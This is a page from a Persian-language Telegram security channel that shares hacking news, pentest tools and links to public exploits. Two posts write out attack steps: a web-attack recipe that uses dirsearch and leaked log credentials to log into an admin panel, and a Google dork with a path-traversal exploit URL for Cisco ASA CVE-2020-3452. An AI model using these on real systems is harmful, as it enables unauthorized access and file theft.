امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
اسکنر smbghost و smbleed

CVE-2020-0796
CVE-2020-1206

https://github.com/ZecOps/SMBGhost-SMBleed-scanner


#windows
#rce


@sec_nerd
هک بار جدید بدون نیاز به لایسنس(نسخه پولی این افزونه فایرفاکس هم وجود داره)

https://addons.mozilla.org/en-US/firefox/addon/hackbar-free/



#firefox #hackbar


@sec_nerd
رایت آپ کشف آسیب پذیری بر روی فیسبوک
این آسیب پذیری به هکرها اجازه میداد هر عکس دلخواهی را حذف کنند


https://bugreader.com/social/write-ups-general-how-we-were-able-to-delete-donald-trump-posts-on-facebook--100955


#facebook
#bugbounty
#pentest
#writeup

@sec_nerd
یک هکر ناشناس dataviper را هک کرده وبیش از ۸۲۰۰ دیتابیس این وبسایت را به سرقت برد

دیتاوایپر یک سرویس امنیتی امریکایی ست که دیتابیس های هک شده در اینترنت را مانیتور و جمع آوری میکند و به مشتریان خود اعلام میکند که آیا قربانی حملات سایبری بوده اند یا خیر

این هکر اعلام کرده است که اطلاعات میلیاردها کاربر را که قربانی هک های سالهای گذشته بوده اند در اختیار دارد.
وی اقدام به ارسال آدرس یک وبسایت در دارک نت برای برخی متخصصان امنیت کرده است.

https://www.zdnet.com/article/hacker-breaches-security-firm-in-act-of-revenge/


#news #breach

@sec_nerd
اکسپلویت کردن یک ایراد امنیتی در ویندوز ۱۰ که منجر به بالا رفتن سطح دسترسی میگردد

https://github.com/Q4n/CVE-2020-1362


#windows #privesc


@sec_nerd
اجرای دستور بر روی گوشی های سامسونگ با نسخه های اندروید خانواده ۸، اندروید۹ و ۱۰ بدون نیاز به دخالت کاربر

اکسپلویت شناسه CVE-2020-8899 کشف شده توسط google project zero

توضیحات فنی
https://googleprojectzero.blogspot.com/2020/07/mms-exploit-part-1-introduction-to-qmage.html


دمو:
https://www.youtube.com/watch?v=ZQnb8kRMkHg


#android
#rce
#samsung


@sec_nerd
یک سناریوی ساده برای حمله به وبسایت

- use https://dirsearch.py -u site -e php,xml,jsp,asp -x 500,403
- got result https://site.com/admin/error.log
- open the log file
- there is juicy info and open https://site.com/admin/index.php
- use the php_auth_user and php_auth_pass
- logged in


#bugbounty
#pentest
#web

@sec_nerd
حمله به شبکه ی ویندوزی با ترکیب دو ابزار Responder و Snarf

https://ijustwannared.team/2017/05/20/responder-and-snarf/


#windows
#privesc
#pivoting

@sec_nerd
اسکن تمام پورتها در ۱۹ ثانیه!

https://github.com/brandonskerritt/RustScan

#network
#recon
#nmap


@sec_nerd
شرح کامل آسیب پذیری کشف شده در sharepoint با شناسه CVE-2020-1147 به همراه اکسپلویت


https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html


#sharepoint
#microsoft
#windows
#rce

@sec_nerd
آسیب پذیری LFI در تجهیزات سیسکو ASA

شناسه:CVE-2020-3452

- Google Dork: inurl:/+CSCOE+/

- Exploit Code
[Victim]/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua" -O [Filename]


#cisco
#lfi

@sec_nerd
شاید خندتون بگیره ولی حقیقت داره!


#hack
#fun


@sec_nerd